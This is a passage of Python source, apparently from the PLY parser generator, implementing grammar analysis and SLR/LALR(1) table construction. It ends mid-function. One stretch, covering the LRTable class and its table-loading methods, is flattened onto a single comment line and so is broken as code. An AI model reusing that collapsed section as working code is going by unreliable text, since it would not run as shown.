
        # 'error' is always a valid terminal (used for error recovery rules)
        self.Terminals['error'] = []

        self.Nonterminals = { }    # A dictionary mapping names of nonterminals to a list
                                   # of rule numbers where they are used.

        self.First = { }           # A dictionary of precomputed FIRST(x) symbols

        self.Follow = { }          # A dictionary of precomputed FOLLOW(x) symbols

        self.Precedence = { }      # Precedence rules for each terminal. Contains tuples of the
                                   # form ('right',level) or ('nonassoc', level) or ('left',level)

        self.UsedPrecedence = { }  # Precedence rules that were actually used by the grammar.
                                   # This is only used to provide error checking and to generate
                                   # a warning about unused precedence rules.

        self.Start = None          # Starting symbol for the grammar

    def __len__(self):
        return len(self.Productions)

    def __getitem__(self,index):
        return self.Productions[index]

    # -----------------------------------------------------------------------------
    # set_precedence()
    #
    # Sets the precedence for a given terminal. assoc is the associativity such as
    # 'left','right', or 'nonassoc'.  level is a numeric level.
    #
    # -----------------------------------------------------------------------------

    def set_precedence(self,term,assoc,level):
        # Precedence must be fully declared before any productions are added,
        # because add_production() resolves %prec against self.Precedence.
        assert self.Productions == [None],"Must call set_precedence() before add_production()"
        if term in self.Precedence:
            raise GrammarError("Precedence already specified for terminal '%s'" % term)
        if assoc not in ['left','right','nonassoc']:
            raise GrammarError("Associativity must be one of 'left','right', or 'nonassoc'")
        self.Precedence[term] = (assoc,level)

    # -----------------------------------------------------------------------------
    # add_production()
    #
    # Given an action function, this function assembles a production rule and
    # computes its precedence level.
    #
    # The production rule is supplied as a list of symbols.   For example,
    # a rule such as 'expr : expr PLUS term' has a production name of 'expr' and
    # symbols ['expr','PLUS','term'].
    #
    # Precedence is determined by the precedence of the right-most non-terminal
    # or the precedence of a terminal specified by %prec.
    #
    # A variety of error checks are performed to make sure production symbols
    # are valid and that %prec is used correctly.
    # -----------------------------------------------------------------------------

    def add_production(self,prodname,syms,func=None,file='',line=0):

        if prodname in self.Terminals:
            raise GrammarError("%s:%d: Illegal rule name '%s'. Already defined as a token" % (file,line,prodname))
        if prodname == 'error':
            raise GrammarError("%s:%d: Illegal rule name '%s'. error is a reserved word" % (file,line,prodname))
        if not _is_identifier.match(prodname):
            raise GrammarError("%s:%d: Illegal rule name '%s'" % (file,line,prodname))

        # Look for literal tokens (quoted single-character terminals)
        for n,s in enumerate(syms):
            if s[0] in "'\"":
                 try:
                     c = eval(s)    # eval of a quoted literal from the grammar spec
                     if (len(c) > 1):
                          raise GrammarError("%s:%d: Literal token %s in rule '%s' may only be a single character" % (file,line,s, prodname))
                     if not c in self.Terminals:
                          self.Terminals[c] = []
                     syms[n] = c
                     continue
                 except SyntaxError:
                     pass
            if not _is_identifier.match(s) and s != '%prec':
                raise GrammarError("%s:%d: Illegal name '%s' in rule '%s'" % (file,line,s, prodname))

        # Determine the precedence level
        if '%prec' in syms:
            if syms[-1] == '%prec':
                raise GrammarError("%s:%d: Syntax error. Nothing follows %%prec" % (file,line))
            if syms[-2] != '%prec':
                raise GrammarError("%s:%d: Syntax error. %%prec can only appear at the end of a grammar rule" % (file,line))
            precname = syms[-1]
            prodprec = self.Precedence.get(precname,None)
            if not prodprec:
                raise GrammarError("%s:%d: Nothing known about the precedence of '%s'" % (file,line,precname))
            else:
                self.UsedPrecedence[precname] = 1
            del syms[-2:]     # Drop %prec from the rule
        else:
            # If no %prec, precedence is determined by the rightmost terminal symbol
            precname = rightmost_terminal(syms,self.Terminals)
            prodprec = self.Precedence.get(precname,('right',0))

        # See if the rule is already in the rulemap
        map = "%s -> %s" % (prodname,syms)
        if map in self.Prodmap:
            m = self.Prodmap[map]
            raise GrammarError("%s:%d: Duplicate rule %s. " % (file,line, m) +
                               "Previous definition at %s:%d" % (m.file, m.line))

        # From this point on, everything is valid.  Create a new Production instance
        pnumber = len(self.Productions)
        if not prodname in self.Nonterminals:
            self.Nonterminals[prodname] = [ ]

        # Add the production number to Terminals and Nonterminals
        for t in syms:
            if t in self.Terminals:
                self.Terminals[t].append(pnumber)
            else:
                if not t in self.Nonterminals:
                    self.Nonterminals[t] = [ ]
                self.Nonterminals[t].append(pnumber)

        # Create a production and add it to the list of productions
        p = Production(pnumber,prodname,syms,prodprec,func,file,line)
        self.Productions.append(p)
        self.Prodmap[map] = p

        # Add to the global productions list
        try:
            self.Prodnames[prodname].append(p)
        except KeyError:
            self.Prodnames[prodname] = [ p ]
        return 0

    # -----------------------------------------------------------------------------
    # set_start()
    #
    # Sets the starting symbol and creates the augmented grammar.  Production
    # rule 0 is S' -> start where start is the start symbol.
    # -----------------------------------------------------------------------------

    def set_start(self,start=None):
        # Default start symbol: the left-hand side of the first real production
        if not start:
            start = self.Productions[1].name
        if start not in self.Nonterminals:
            raise GrammarError("start symbol %s undefined" % start)
        self.Productions[0] = Production(0,"S'",[start])
        self.Nonterminals[start].append(0)
        self.Start = start

    # -----------------------------------------------------------------------------
    # find_unreachable()
    #
    # Find all of the nonterminal symbols that can't be reached from the starting
    # symbol.  Returns a list of nonterminals that can't be reached.
    # -----------------------------------------------------------------------------

    def find_unreachable(self):

        # Mark all symbols that are reachable from a symbol s
        def mark_reachable_from(s):
            if reachable[s]:
                # We've already reached symbol s.
                return
            reachable[s] = 1
            for p in self.Prodnames.get(s,[]):
                for r in p.prod:
                    mark_reachable_from(r)

        reachable = { }
        for s in list(self.Terminals) + list(self.Nonterminals):
            reachable[s] = 0

        # Start the walk from the grammar's start symbol (rhs of rule 0)
        mark_reachable_from( self.Productions[0].prod[0] )

        return [s for s in list(self.Nonterminals)
                        if not reachable[s]]

    # -----------------------------------------------------------------------------
    # infinite_cycles()
    #
    # This function looks at the various parsing rules and tries to detect
    # infinite recursion cycles (grammar rules where there is no possible way
    # to derive a string of only terminals).
    # -----------------------------------------------------------------------------

    def infinite_cycles(self):
        terminates = {}

        # Terminals: trivially terminate
        for t in self.Terminals:
            terminates[t] = 1

        terminates['$end'] = 1

        # Nonterminals:

        # Initialize to false:
        for n in self.Nonterminals:
            terminates[n] = 0

        # Then propagate termination until no change (fixed-point iteration):
        while 1:
            some_change = 0
            for (n,pl) in self.Prodnames.items():
                # Nonterminal n terminates iff any of its productions terminates.
                for p in pl:
                    # Production p terminates iff all of its rhs symbols terminate.
                    for s in p.prod:
                        if not terminates[s]:
                            # The symbol s does not terminate,
                            # so production p does not terminate.
                            p_terminates = 0
                            break
                    else:
                        # didn't break from the loop,
                        # so every symbol s terminates
                        # so production p terminates.
                        p_terminates = 1

                    if p_terminates:
                        # symbol n terminates!
                        if not terminates[n]:
                            terminates[n] = 1
                            some_change = 1
                        # Don't need to consider any more productions for this n.
                        break

            if not some_change:
                break

        infinite = []
        for (s,term) in terminates.items():
            if not term:
                if not s in self.Prodnames and not s in self.Terminals and s != 'error':
                    # s is used-but-not-defined, and we've already warned of that,
                    # so it would be overkill to say that it's also non-terminating.
                    pass
                else:
                    infinite.append(s)

        return infinite

    # -----------------------------------------------------------------------------
    # undefined_symbols()
    #
    # Find all symbols that were used the grammar, but not defined as tokens or
    # grammar rules.  Returns a list of tuples (sym, prod) where sym in the symbol
    # and prod is the production where the symbol was used.
    # -----------------------------------------------------------------------------
    def undefined_symbols(self):
        result = []
        for p in self.Productions:
            if not p: continue          # Skip the reserved slot 0 before set_start()

            for s in p.prod:
                if not s in self.Prodnames and not s in self.Terminals and s != 'error':
                    result.append((s,p))
        return result

    # -----------------------------------------------------------------------------
    # unused_terminals()
    #
    # Find all terminals that were defined, but not used by the grammar.  Returns
    # a list of all symbols.
    # -----------------------------------------------------------------------------
    def unused_terminals(self):
        unused_tok = []
        for s,v in self.Terminals.items():
            # 'error' is implicitly defined; never report it as unused
            if s != 'error' and not v:
                unused_tok.append(s)

        return unused_tok

    # ------------------------------------------------------------------------------
    # unused_rules()
    #
    # Find all grammar rules that were defined,  but not used (maybe not reachable)
    # Returns a list of productions.
    # ------------------------------------------------------------------------------

    def unused_rules(self):
        unused_prod = []
        for s,v in self.Nonterminals.items():
            if not v:
                p = self.Prodnames[s][0]
                unused_prod.append(p)
        return unused_prod

    # -----------------------------------------------------------------------------
    # unused_precedence()
    #
    # Returns a list of tuples (term,precedence) corresponding to precedence
    # rules that were never used by the grammar.  term is the name of the terminal
    # on which precedence was applied and precedence is a string such as 'left' or
    # 'right' corresponding to the type of precedence.
    # -----------------------------------------------------------------------------

    def unused_precedence(self):
        unused = []
        for termname in self.Precedence:
            if not (termname in self.Terminals or termname in self.UsedPrecedence):
                unused.append((termname,self.Precedence[termname][0]))

        return unused

    # -------------------------------------------------------------------------
    # _first()
    #
    # Compute the value of FIRST1(beta) where beta is a tuple of symbols.
    #
    # During execution of compute_first1, the result may be incomplete.
    # Afterward (e.g., when called from compute_follow()), it will be complete.
    # -------------------------------------------------------------------------
    def _first(self,beta):

        # We are computing First(x1,x2,x3,...,xn)
        result = [ ]
        for x in beta:
            x_produces_empty = 0

            # Add all the non-<empty> symbols of First[x] to the result.
            for f in self.First[x]:
                if f == '<empty>':
                    x_produces_empty = 1
                else:
                    if f not in result: result.append(f)

            if x_produces_empty:
                # We have to consider the next x in beta,
                # i.e. stay in the loop.
                pass
            else:
                # We don't have to consider any further symbols in beta.
                break
        else:
            # There was no 'break' from the loop,
            # so x_produces_empty was true for all x in beta,
            # so beta produces empty as well.
            result.append('<empty>')

        return result

    # -------------------------------------------------------------------------
    # compute_first()
    #
    # Compute the value of FIRST1(X) for all symbols
    # -------------------------------------------------------------------------
    def compute_first(self):
        # Memoized: once computed, reuse the cached First sets
        if self.First:
            return self.First

        # Terminals:
        for t in self.Terminals:
            self.First[t] = [t]

        self.First['$end'] = ['$end']

        # Nonterminals:

        # Initialize to the empty set:
        for n in self.Nonterminals:
            self.First[n] = []

        # Then propagate symbols until no change (fixed-point iteration):
        while 1:
            some_change = 0
            for n in self.Nonterminals:
                for p in self.Prodnames[n]:
                    for f in self._first(p.prod):
                        if f not in self.First[n]:
                            self.First[n].append( f )
                            some_change = 1
            if not some_change:
                break

        return self.First

    # ---------------------------------------------------------------------
    # compute_follow()
    #
    # Computes all of the follow sets for every non-terminal symbol.  The
    # follow set is the set of all symbols that might follow a given
    # non-terminal.  See the Dragon book, 2nd Ed. p. 189.
    # ---------------------------------------------------------------------
    def compute_follow(self,start=None):
        # If already computed, return the result
        if self.Follow:
            return self.Follow

        # If first sets not computed yet, do that first.
        if not self.First:
            self.compute_first()

        # Add '$end' to the follow list of the start symbol
        for k in self.Nonterminals:
            self.Follow[k] = [ ]

        if not start:
            start = self.Productions[1].name

        self.Follow[start] = [ '$end' ]

        while 1:
            didadd = 0
            for p in self.Productions[1:]:
                # Here is the production set
                for i in range(len(p.prod)):
                    B = p.prod[i]
                    if B in self.Nonterminals:
                        # Okay. We got a non-terminal in a production
                        fst = self._first(p.prod[i+1:])
                        hasempty = 0
                        for f in fst:
                            if f != '<empty>' and f not in self.Follow[B]:
                                self.Follow[B].append(f)
                                didadd = 1
                            if f == '<empty>':
                                hasempty = 1
                        if hasempty or i == (len(p.prod)-1):
                            # Add elements of follow(a) to follow(b)
                            for f in self.Follow[p.name]:
                                if f not in self.Follow[B]:
                                    self.Follow[B].append(f)
                                    didadd = 1
            if not didadd: break
        return self.Follow

    # -----------------------------------------------------------------------------
    # build_lritems()
    #
    # This function walks the list of productions and builds a complete set of the
    # LR items.  The LR items are stored in two ways:  First, they are uniquely
    # numbered and placed in the list _lritems.  Second, a linked list of LR items
    # is built for each production.  For example:
    #
    #   E -> E PLUS E
    #
    # Creates the list
    #
    #  [E -> . E PLUS E, E -> E . PLUS E, E -> E PLUS . E, E -> E PLUS E . ]
    # -----------------------------------------------------------------------------

    def build_lritems(self):
        for p in self.Productions:
            lastlri = p
            i = 0
            lr_items = []
            while 1:
                if i > len(p):
                    lri = None      # Dot moved past the end: terminate the chain
                else:
                    lri = LRItem(p,i)
                    # Precompute the list of productions immediately following
                    try:
                        lri.lr_after = self.Prodnames[lri.prod[i+1]]
                    except (IndexError,KeyError):
                        lri.lr_after = []
                    try:
                        lri.lr_before = lri.prod[i-1]
                    except IndexError:
                        lri.lr_before = None

                lastlri.lr_next = lri
                if not lri: break
                lr_items.append(lri)
                lastlri = lri
                i += 1
            p.lr_items = lr_items

# -----------------------------------------------------------------------------
#                            == Class LRTable ==
#
# This basic class represents a basic table of LR parsing information.
# Methods for generating the tables are not defined here.  They are defined
# in the derived class LRGeneratedTable.
# ----------------------------------------------------------------------------- class VersionError(YaccError): pass class LRTable(object): def __init__(self): self.lr_action = None self.lr_goto = None self.lr_productions = None self.lr_method = None def read_table(self,module): if isinstance(module,types.ModuleType): parsetab = module else: if sys.version_info[0] < 3: exec("import %s as parsetab" % module) else: env = { } exec("import %s as parsetab" % module, env, env) parsetab = env['parsetab'] if parsetab._tabversion != __tabversion__: raise VersionError("yacc table file version is out of date") self.lr_action = parsetab._lr_action self.lr_goto = parsetab._lr_goto self.lr_productions = [] for p in parsetab._lr_productions: self.lr_productions.append(MiniProduction(*p)) self.lr_method = parsetab._lr_method return parsetab._lr_signature def read_pickle(self,filename): try: import cPickle as pickle except ImportError: import pickle in_f = open(filename,"rb") tabversion = pickle.load(in_f) if tabversion != __tabversion__: raise VersionError("yacc table file version is out of date") self.lr_method = pickle.load(in_f) signature = pickle.load(in_f) self.lr_action = pickle.load(in_f) self.lr_goto = pickle.load(in_f) productions = pickle.load(in_f) self.lr_productions = [] for p in productions: self.lr_productions.append(MiniProduction(*p)) in_f.close() return signature # Bind all production function names to callable objects in pdict def bind_callables(self,pdict): for p in self.lr_productions: p.bind(pdict) # ----------------------------------------------------------------------------- # === LR Generator === # # The following classes and functions are used to generate LR parsing tables on # a grammar. 
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# digraph()
# traverse()
#
# The following two functions are used to compute set valued functions
# of the form:
#
#     F(x) = F'(x) U U{F(y) | x R y}
#
# This is used to compute the values of Read() sets as well as FOLLOW sets
# in LALR(1) generation.
#
# Inputs:  X    - An input set
#          R    - A relation
#          FP   - Set-valued function
# ------------------------------------------------------------------------------

def digraph(X,R,FP):
    """Compute F(x) = FP(x) U U{ F(y) | x R y } for every x in X.

    Uses the DeRemer/Pennello digraph algorithm: a Tarjan-style depth-first
    traversal that merges the results of elements belonging to the same
    strongly-connected component (see traverse()).  Returns a dict mapping
    each element of X to its computed set (a list).
    """
    N = { }
    for x in X:
        N[x] = 0
    stack = []
    F = { }
    for x in X:
        if N[x] == 0: traverse(x,N,stack,F,X,R,FP)
    return F

def traverse(x,N,stack,F,X,R,FP):
    """Depth-first helper for digraph().

    N[x] holds the depth-first number of x (0 = unvisited; MAXINT once the
    SCC containing x is complete).  When x is found to be the root of a
    strongly-connected component, every member still on the stack receives
    x's result set, so all members of a cycle share the same F value.
    """
    stack.append(x)
    d = len(stack)
    N[x] = d
    F[x] = FP(x)             # F(X) <- F'(x)

    rel = R(x)               # Get y's related to x
    for y in rel:
        if N[y] == 0:
             traverse(y,N,stack,F,X,R,FP)
        N[x] = min(N[x],N[y])
        for a in F.get(y,[]):
            if a not in F[x]: F[x].append(a)
    if N[x] == d:
       # x is the root of a strongly-connected component; pop the whole
       # component and give every member the same (shared) result.
       N[stack[-1]] = MAXINT
       F[stack[-1]] = F[x]
       element = stack.pop()
       while element != x:
           N[stack[-1]] = MAXINT
           F[stack[-1]] = F[x]
           element = stack.pop()

# Raised for errors encountered during SLR/LALR table construction.
class LALRError(YaccError): pass

# -----------------------------------------------------------------------------
#                             == LRGeneratedTable ==
#
# This class implements the LR table generation algorithm.    There are no
# public methods except for write()
# -----------------------------------------------------------------------------

class LRGeneratedTable(LRTable):
    """Generate SLR or LALR(1) parse tables from a Grammar object.

    Construction immediately builds the action/goto tables (lr_parse_table()).
    Conflicts found during construction are recorded in sr_conflicts and
    rr_conflicts.  Tables can be saved with write_table() or pickle_table().
    """

    def __init__(self,grammar,method='LALR',log=None):
        """Build tables for *grammar* using 'SLR' or 'LALR'; *log* receives
        the debugging output (defaults to a NullLogger)."""
        if method not in ['SLR','LALR']:
            raise LALRError("Unsupported method %s" % method)

        self.grammar = grammar
        self.lr_method = method

        # Set up the logger
        if not log:
            log = NullLogger()
        self.log = log

        # Internal attributes
        self.lr_action     = {}        # Action table
        self.lr_goto       = {}        # Goto table
        self.lr_productions  = grammar.Productions    # Copy of grammar Production array
        self.lr_goto_cache = {}        # Cache of computed gotos
        self.lr0_cidhash   = {}        # Cache of closures

        self._add_count    = 0         # Internal counter used to detect cycles

        # Diagnostic information filled in by the table generator
        self.sr_conflict   = 0
        self.rr_conflict   = 0
        self.conflicts     = []        # List of conflicts

        self.sr_conflicts  = []
        self.rr_conflicts  = []

        # Build the tables
        self.grammar.build_lritems()
        self.grammar.compute_first()
        self.grammar.compute_follow()
        self.lr_parse_table()

    # Compute the LR(0) closure operation on I, where I is a set of LR(0) items.

    def lr0_closure(self,I):
        """Return the LR(0) closure of item set I as a new list.

        _add_count is bumped once per call so that the per-item lr0_added
        marker can tell whether an item was already added in THIS closure
        computation without clearing markers between calls.
        """
        self._add_count += 1

        # Add everything in I to J
        J = I[:]
        didadd = 1
        while didadd:
            didadd = 0
            for j in J:
                for x in j.lr_after:
                    if getattr(x,"lr0_added",0) == self._add_count: continue
                    # Add B --> .G to J
                    J.append(x.lr_next)
                    x.lr0_added = self._add_count
                    didadd = 1

        return J

    # Compute the LR(0) goto function goto(I,X) where I is a set
    # of LR(0) items and X is a grammar symbol.   This function is written
    # in a way that guarantees uniqueness of the generated goto sets
    # (i.e. the same goto set will never be returned as two different Python
    # objects).  With uniqueness, we can later do fast set comparisons using
    # id(obj) instead of element-wise comparison.

    def lr0_goto(self,I,x):
        """Return goto(I,x); results are cached so identical goto sets are
        always the very same list object (enabling id()-based comparison)."""
        # First we look for a previously cached entry
        g = self.lr_goto_cache.get((id(I),x),None)
        if g: return g

        # Now we generate the goto set in a way that guarantees uniqueness
        # of the result.  The cache entry for symbol x is a trie keyed by the
        # id() of each successor item; '$end' marks the computed set.
        s = self.lr_goto_cache.get(x,None)
        if not s:
            s = { }
            self.lr_goto_cache[x] = s

        gs = [ ]
        for p in I:
            n = p.lr_next
            if n and n.lr_before == x:
                s1 = s.get(id(n),None)
                if not s1:
                    s1 = { }
                    s[id(n)] = s1
                gs.append(n)
                s = s1
        g = s.get('$end',None)
        if not g:
            if gs:
                g = self.lr0_closure(gs)
                s['$end'] = g
            else:
                s['$end'] = gs
        self.lr_goto_cache[(id(I),x)] = g
        return g

    # Compute the LR(0) sets of item function
    def lr0_items(self):
        """Return the canonical collection C of LR(0) item sets; each set's
        state number is recorded in lr0_cidhash keyed by id(set)."""
        C = [ self.lr0_closure([self.grammar.Productions[0].lr_next]) ]
        i = 0
        for I in C:
            self.lr0_cidhash[id(I)] = i
            i += 1

        # Loop over the items in C and each grammar symbols
        i = 0
        while i < len(C):
            I = C[i]
            i += 1

            # Collect all of the symbols that could possibly be in the goto(I,X) sets
            asyms = { }
            for ii in I:
                for s in ii.usyms:
                    asyms[s] = None

            for x in asyms:
                g = self.lr0_goto(I,x)
                if not g:  continue
                if id(g) in self.lr0_cidhash: continue
                self.lr0_cidhash[id(g)] = len(C)
                C.append(g)

        return C

    # -----------------------------------------------------------------------------
    #                       ==== LALR(1) Parsing ====
    #
    # LALR(1) parsing is almost exactly the same as SLR except that instead of
    # relying upon Follow() sets when performing reductions, a more selective
    # lookahead set that incorporates the state of the LR(0) machine is utilized.
    # Thus, we mainly just have to focus on calculating the lookahead sets.
    #
    # The method used here is due to DeRemer and Pennelo (1982).
    #
    # DeRemer, F. L., and T. J. Pennelo: "Efficient Computation of LALR(1)
    #     Lookahead Sets", ACM Transactions on Programming Languages and Systems,
    #     Vol. 4, No. 4, Oct. 1982, pp. 615-649
    #
    # Further details can also be found in:
    #
    #  J. Tremblay and P. Sorenson, "The Theory and Practice of Compiler Writing",
    #      McGraw-Hill Book Company, (1985).
    #
    # -----------------------------------------------------------------------------

    # -----------------------------------------------------------------------------
    # compute_nullable_nonterminals()
    #
    # Creates a dictionary containing all of the non-terminals that might produce
    # an empty production.
    # -----------------------------------------------------------------------------

    def compute_nullable_nonterminals(self):
        """Return {name: 1} for every nonterminal that can derive the empty
        string, iterating to a fixed point."""
        nullable = {}
        num_nullable = 0
        while 1:
           for p in self.grammar.Productions[1:]:
               if p.len == 0:
                    nullable[p.name] = 1
                    continue
               for t in p.prod:
                    if not t in nullable: break
               else:
                    nullable[p.name] = 1
           if len(nullable) == num_nullable: break
           num_nullable = len(nullable)
        return nullable

    # -----------------------------------------------------------------------------
    # find_nonterminal_trans(C)
    #
    # Given a set of LR(0) items, this functions finds all of the non-terminal
    # transitions.    These are transitions in which a dot appears immediately before
    # a non-terminal.   Returns a list of tuples of the form (state,N) where state
    # is the state number and N is the nonterminal symbol.
    #
    # The input C is the set of LR(0) items.
    # -----------------------------------------------------------------------------

    def find_nonterminal_transitions(self,C):
         trans = []
         for state in range(len(C)):
             for p in C[state]:
                 if p.lr_index < p.len - 1:
                      t = (state,p.prod[p.lr_index+1])
                      if t[1] in self.grammar.Nonterminals:
                            if t not in trans: trans.append(t)
             state = state + 1
         return trans

    # -----------------------------------------------------------------------------
    # dr_relation()
    #
    # Computes the DR(p,A) relationships for non-terminal transitions.  The input
    # is a tuple (state,N) where state is a number and N is a nonterminal symbol.
    #
    # Returns a list of terminals.
    # -----------------------------------------------------------------------------

    def dr_relation(self,C,trans,nullable):
        """Direct-read set: terminals shiftable immediately after taking the
        nonterminal transition *trans* = (state, N)."""
        dr_set = { }
        state,N = trans
        terms = []

        g = self.lr0_goto(C[state],N)
        for p in g:
           if p.lr_index < p.len - 1:
               a = p.prod[p.lr_index+1]
               if a in self.grammar.Terminals:
                   if a not in terms: terms.append(a)

        # This extra bit is to handle the start state
        if state == 0 and N == self.grammar.Productions[0].prod[0]:
           terms.append('$end')

        return terms

    # -----------------------------------------------------------------------------
    # reads_relation()
    #
    # Computes the READS() relation (p,A) READS (t,C).
    # -----------------------------------------------------------------------------

    def reads_relation(self,C, trans, empty):
        """Return the list of transitions (j, a) reached from *trans* through
        a nullable nonterminal a (the READS relation)."""
        # Look for empty transitions
        rel = []
        state, N = trans

        g = self.lr0_goto(C[state],N)
        j = self.lr0_cidhash.get(id(g),-1)
        for p in g:
            if p.lr_index < p.len - 1:
                 a = p.prod[p.lr_index + 1]
                 if a in empty:
                      rel.append((j,a))

        return rel

    # -----------------------------------------------------------------------------
    # compute_lookback_includes()
    #
    # Determines the lookback and includes relations
    #
    # LOOKBACK:
    #
    # This relation is determined by running the LR(0) state machine forward.
    # For example, starting with a production "N : . A B C", we run it forward
    # to obtain "N : A B C ."   We then build a relationship between this final
    # state and the starting state.   These relationships are stored in a dictionary
    # lookdict.
    #
    # INCLUDES:
    #
    # Computes the INCLUDE() relation (p,A) INCLUDES (p',B).
    #
    # This relation is used to determine non-terminal transitions that occur
    # inside of other non-terminal transition states.   (p,A) INCLUDES (p', B)
    # if the following holds:
    #
    #       B -> LAT, where T -> epsilon and p' -L-> p
    #
    # L is essentially a prefix (which may be empty), T is a suffix that must be
    # able to derive an empty string.  State p' must lead to state p with the string L.
    #
    # -----------------------------------------------------------------------------

    def compute_lookback_includes(self,C,trans,nullable):
        """Return (lookdict, includedict) for the given nonterminal
        transitions, as defined in the header comment above."""

        lookdict = {}          # Dictionary of lookback relations
        includedict = {}       # Dictionary of include relations

        # Make a dictionary of non-terminal transitions
        dtrans = {}
        for t in trans:
            dtrans[t] = 1

        # Loop over all transitions and compute lookbacks and includes
        for state,N in trans:
            lookb = []
            includes = []
            for p in C[state]:
                if p.name != N: continue

                # Okay, we have a name match.  We now follow the production all the way
                # through the state machine until we get the . on the right hand side

                lr_index = p.lr_index
                j = state
                while lr_index < p.len - 1:
                     lr_index = lr_index + 1
                     t = p.prod[lr_index]

                     # Check to see if this symbol and state are a non-terminal transition
                     if (j,t) in dtrans:
                           # Yes.  Okay, there is some chance that this is an includes relation
                           # the only way to know for certain is whether the rest of the
                           # production derives empty

                           li = lr_index + 1
                           while li < p.len:
                                if p.prod[li] in self.grammar.Terminals: break      # No forget it
                                if not p.prod[li] in nullable: break
                                li = li + 1
                           else:
                                # Appears to be a relation between (j,t) and (state,N)
                                includes.append((j,t))

                     g = self.lr0_goto(C[j],t)               # Go to next set
                     j = self.lr0_cidhash.get(id(g),-1)      # Go to next state

                # When we get here, j is the final state, now we have to locate the production
                for r in C[j]:
                     if r.name != p.name: continue
                     if r.len != p.len:   continue
                     i = 0
                     # This loop is comparing a production ". A B C" with "A B C ."
                     while i < r.lr_index:
                          if r.prod[i] != p.prod[i+1]: break
                          i = i + 1
                     else:
                          lookb.append((j,r))
            for i in includes:
                 if not i in includedict: includedict[i] = []
                 includedict[i].append((state,N))
            lookdict[(state,N)] = lookb

        return lookdict,includedict

    # -----------------------------------------------------------------------------
    # compute_read_sets()
    #
    # Given a set of LR(0) items, this function computes the read sets.
    #
    # Inputs:  C        =  Set of LR(0) items
    #          ntrans   = Set of nonterminal transitions
    #          nullable = Set of empty transitions
    #
    # Returns a set containing the read sets
    # -----------------------------------------------------------------------------

    def compute_read_sets(self,C, ntrans, nullable):
        FP = lambda x: self.dr_relation(C,x,nullable)
        R =  lambda x: self.reads_relation(C,x,nullable)
        F = digraph(ntrans,R,FP)
        return F

    # -----------------------------------------------------------------------------
    # compute_follow_sets()
    #
    # Given a set of LR(0) items, a set of non-terminal transitions, a readset,
    # and an include set, this function computes the follow sets
    #
    # Follow(p,A) = Read(p,A) U U {Follow(p',B) | (p,A) INCLUDES (p',B)}
    #
    # Inputs:
    #            ntrans     = Set of nonterminal transitions
    #            readsets   = Readset (previously computed)
    #            inclsets   = Include sets (previously computed)
    #
    # Returns a set containing the follow sets
    # -----------------------------------------------------------------------------

    def compute_follow_sets(self,ntrans,readsets,inclsets):
         FP = lambda x: readsets[x]
         R  = lambda x: inclsets.get(x,[])
         F = digraph(ntrans,R,FP)
         return F

    # -----------------------------------------------------------------------------
    # add_lookaheads()
    #
    # Attaches the lookahead symbols to grammar rules.
    #
    # Inputs:    lookbacks         -  Set of lookback relations
    #            followset         -  Computed follow set
    #
    # This function directly attaches the lookaheads to productions contained
    # in the lookbacks set
    # -----------------------------------------------------------------------------

    def add_lookaheads(self,lookbacks,followset):
        for trans,lb in lookbacks.items():
            # Loop over productions in lookback
            for state,p in lb:
                 if not state in p.lookaheads:
                      p.lookaheads[state] = []
                 f = followset.get(trans,[])
                 for a in f:
                      if a not in p.lookaheads[state]: p.lookaheads[state].append(a)

    # -----------------------------------------------------------------------------
    # add_lalr_lookaheads()
    #
    # This function does all of the work of adding lookahead information for use
    # with LALR parsing
    # -----------------------------------------------------------------------------

    def add_lalr_lookaheads(self,C):
        """Run the full DeRemer-Pennello pipeline over the LR(0) collection C
        and attach LALR(1) lookaheads to the productions."""
        # Determine all of the nullable nonterminals
        nullable = self.compute_nullable_nonterminals()

        # Find all non-terminal transitions
        trans = self.find_nonterminal_transitions(C)

        # Compute read sets
        readsets = self.compute_read_sets(C,trans,nullable)

        # Compute lookback/includes relations
        lookd, included = self.compute_lookback_includes(C,trans,nullable)

        # Compute LALR FOLLOW sets
        followsets = self.compute_follow_sets(trans,readsets,included)

        # Add all of the lookaheads
        self.add_lookaheads(lookd,followsets)

    # -----------------------------------------------------------------------------
    # lr_parse_table()
    #
    # This function constructs the parse tables for SLR or LALR
    # -----------------------------------------------------------------------------

    def lr_parse_table(self):
        """Construct the action and goto tables, resolving shift/reduce and
        reduce/reduce conflicts by precedence and rule order; conflicts are
        logged and recorded in sr_conflicts / rr_conflicts."""
        Productions = self.grammar.Productions
        Precedence  = self.grammar.Precedence
        goto   = self.lr_goto         # Goto array
        action = self.lr_action      # Action array
        log    = self.log            # Logger for output

        actionp = { }                # Action production array (temporary)

        log.info("Parsing method: %s", self.lr_method)

        # Step 1: Construct C = { I0, I1, ... IN}, collection of LR(0) items
        # This determines the number of states

        C = self.lr0_items()

        if self.lr_method == 'LALR':
            self.add_lalr_lookaheads(C)

        # Build the parser table, state by state
        st = 0
        for I in C:
            # Loop over each production in I
            actlist = [ ]              # List of actions
            st_action  = { }
            st_actionp = { }
            st_goto    = { }
            log.info("")
            log.info("state %d", st)
            log.info("")
            for p in I:
                log.info("    (%d) %s", p.number, str(p))
            log.info("")

            for p in I:
                    if p.len == p.lr_index + 1:
                        if p.name == "S'":
                            # Start symbol. Accept!
                            st_action["$end"] = 0
                            st_actionp["$end"] = p
                        else:
                            # We are at the end of a production.  Reduce!
                            if self.lr_method == 'LALR':
                                laheads = p.lookaheads[st]
                            else:
                                laheads = self.grammar.Follow[p.name]
                            for a in laheads:
                                actlist.append((a,p,"reduce using rule %d (%s)" % (p.number,p)))
                                r = st_action.get(a,None)
                                if r is not None:
                                    # Whoa. Have a shift/reduce or reduce/reduce conflict
                                    if r > 0:
                                        # Need to decide on shift or reduce here
                                        # By default we favor shifting. Need to add
                                        # some precedence rules here.
                                        sprec,slevel = Productions[st_actionp[a].number].prec
                                        rprec,rlevel = Precedence.get(a,('right',0))
                                        if (slevel < rlevel) or ((slevel == rlevel) and (rprec == 'left')):
                                            # We really need to reduce here.
                                            st_action[a] = -p.number
                                            st_actionp[a] = p
                                            if not slevel and not rlevel:
                                                log.info("  ! shift/reduce conflict for %s resolved as reduce",a)
                                                self.sr_conflicts.append((st,a,'reduce'))
                                            Productions[p.number].reduced += 1
                                        elif (slevel == rlevel) and (rprec == 'nonassoc'):
                                            st_action[a] = None
                                        else:
                                            # Hmmm. Guess we'll keep the shift
                                            if not rlevel:
                                                log.info("  ! shift/reduce conflict for %s resolved as shift",a)
                                                self.sr_conflicts.append((st,a,'shift'))
                                    elif r < 0:
                                        # Reduce/reduce conflict.   In this case, we favor the rule
                                        # that was defined first in the grammar file
                                        oldp = Productions[-r]
